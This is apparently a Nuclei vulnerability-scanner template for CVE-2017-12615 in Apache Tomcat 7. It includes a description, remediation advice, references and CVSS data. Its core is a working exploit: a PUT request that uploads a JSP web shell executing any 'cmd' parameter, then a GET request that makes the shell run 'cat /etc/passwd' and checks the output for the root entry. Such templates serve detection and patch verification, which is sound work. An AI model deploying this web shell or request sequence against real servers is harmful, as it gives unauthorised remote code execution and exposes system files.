id: CVE-2017-12615 info: name: Apache Tomcat Servers - Remote Code Execution author: pikpikcu severity: high description: | Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. reference: - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392 - https://nvd.nist.gov/vuln/detail/CVE-2017-12615 - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 epss-score: 0.97499 epss-percentile: 0.99974 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive http: - method: PUT path: - "{{BaseURL}}/poc.jsp/" body: | <%@ page import="java.util.*,java.io.*"%> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> headers: Content-Type: application/x-www-form-urlencoded - method: GET path: - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a00483046022100a3cdcb5d83f4211278a3087007b8f087e9771a0d55efe766db8780fa9a37e761022100b1049b1a0cb2055b0fe1563692760c2e15e74ead15f2c17d4a9e450c63af8807:922c64590222798bb761d5b6d8e72950